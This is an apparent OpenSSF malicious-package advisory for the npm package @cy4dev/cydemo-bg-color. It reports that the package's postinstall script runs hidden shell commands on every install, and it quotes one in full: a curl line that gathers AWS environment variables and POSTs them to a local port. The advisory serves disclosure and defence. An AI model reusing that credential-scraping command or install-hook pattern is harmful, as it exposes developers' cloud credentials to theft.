MAL-2026-12504Malicious code in @cy4dev/cydemo-bg-color (npm)
| Ecosystem | Package | Version |
|---|---|---|
| npm | @cy4dev/cydemo-bg-color | 4.0.0 |
| npm | @cy4dev/cydemo-bg-color | 5.0.0 |
| npm | @cy4dev/cydemo-bg-color | 6.0.0 |
| npm | @cy4dev/cydemo-bg-color | 7.0.0 |
{"schema_version":"1.7.4","id":"MAL-2026-12504","published":"2026-08-05T13:09:23Z","modified":"2026-08-06T23:29:17.500813240Z","summary":"Malicious code in @cy4dev/cydemo-bg-color (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5e0e5eedb2c2a44513fd808788f02499f57e3c2877c4c69d8a84b0d4038d7fe0)\n@cy4dev/cydemo-bg-color@7.0.0 ships a postinstall lifecycle script (src/postinstall.js) that runs at `npm install` time and invokes node:child_process.exec with two shell commands. The first, `curl -X POST -d \\`env | grep AWS\\` http://localhost:8000`, enumerates AWS_*-prefixed environment variables from the installer's shell and POSTs them as the request body — a functioning credential-exfiltration primitive against the installer's environment. The second, `open /System/Applications/Calculator.app`, launches a GUI application on macOS, demonstrating arbitrary host-shell execution triggered solely by installing the package. The package advertises itself as a DOM background-color helper; the postinstall behavior has no build or runtime purpose consistent with that description. The exfiltration destination in this build is loopback (localhost:8000), so the AWS credentials do not leave the host in this specific version, but the credential-scrape and arbitrary-exec code paths execute unconditionally on every install.\n","affected":[{"package":{"name":"@cy4dev/cydemo-bg-color","ecosystem":"npm"},"versions":["5.0.0","7.0.0","6.0.0","4.0.0"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"evidence_files":[{"path":"src/postinstall.js","sha256":"8450386d3b622f75563a77772aa903aac4d81ed001bddb82d1c577c84beaf979","tlsh":"f6c08ca80f1acb3098732af71c11e01d04a390a84391b78956819970a34424d23022dd"},{"path":"package.json","sha256":"f95aebb83405b1097708aed5c8799307ba066663965d1319ee705b9edb83207d","tlsh":"e411ab36c5705c6312cc69689c2a4943a460ac8b09887d1d3bdb935c8f4e16b10fe3ae"}],"package_integrity":[{"filename":"cydemo-bg-color-5.0.0.tgz","hashes":{"sha1":"c3cfd9164da6a225098fd00b290a5a375d93d0a6","sha512_sri":"sha512-9L5EFEIg/5GvnqXsUdC/0T9PDZNSm1F6IkXztIrpP7Ax7qLkXA0OAFkUECfPE4/9NnjKicVDTi4yvZ1w8SSRxg=="}}]}}}],"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@cy4dev/cydemo-bg-color/v/5.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@cy4dev/cydemo-bg-color/v/7.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@cy4dev/cydemo-bg-color/v/6.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@cy4dev/cydemo-bg-color/v/4.0.0"}],"database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-014904","import_time":"2026-08-05T14:19:41.60110866Z","modified_time":"2026-08-05T13:09:23Z","sha256":"0a3c2868e02f68c0db6cf728cb6e175ccf4fc359e9b4b503a2ea3389896042ca","source":"amazon-inspector","versions":["5.0.0"]},{"id":"IN-MAL-2026-014911","import_time":"2026-08-05T14:19:42.21713147Z","modified_time":"2026-08-05T13:10:21Z","sha256":"5e0e5eedb2c2a44513fd808788f02499f57e3c2877c4c69d8a84b0d4038d7fe0","source":"amazon-inspector","versions":["7.0.0"]},{"id":"IN-MAL-2026-016664","import_time":"2026-08-06T18:09:03.052391199Z","modified_time":"2026-08-06T15:52:38Z","sha256":"42ae49bf485fbb6060cea428f0033d8c2ae42427925506b54657b3f32687f19d","source":"amazon-inspector","versions":["6.0.0"]},{"id":"IN-MAL-2026-016665","import_time":"2026-08-06T18:09:03.164871555Z","modified_time":"2026-08-06T15:52:50Z","sha256":"909786ba6fd3cc48914b6e06276d9116904680414d99ec061f6de28491feb3c4","source":"amazon-inspector","versions":["4.0.0"]}]},"credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}数据来源:OpenSSF Malicious Packages · Apache-2.0